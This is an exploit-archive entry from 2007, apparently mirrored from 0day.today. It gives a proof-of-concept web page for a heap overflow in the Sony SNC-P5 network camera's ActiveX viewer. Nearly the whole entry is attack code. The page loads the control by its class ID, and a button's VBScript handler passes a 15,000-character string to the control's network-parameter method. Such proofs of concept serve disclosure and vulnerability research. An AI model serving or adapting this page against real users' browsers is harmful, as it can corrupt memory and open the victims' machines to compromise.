id: 6414
date: 06/26/2007
title: Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC
author: Keystr0ke
cves: 

================================================================
Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC
================================================================





<!--
Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC


-->

<script language = 'vbscript'>
Sub tryMe()
  buff = String(15000, "A")
  viewer.PrmSetNetworkParam buff, 1
End Sub
</script>

<OBJECT CLASSID="CLSID:5CB430A9-CAAC-4C91-AF61-6D410EEE1221" id="viewer"> </OBJECT>

<input language=VBScript onclick=tryMe() type=button value="Click Me">



#  0day.today [2023-03-21]  #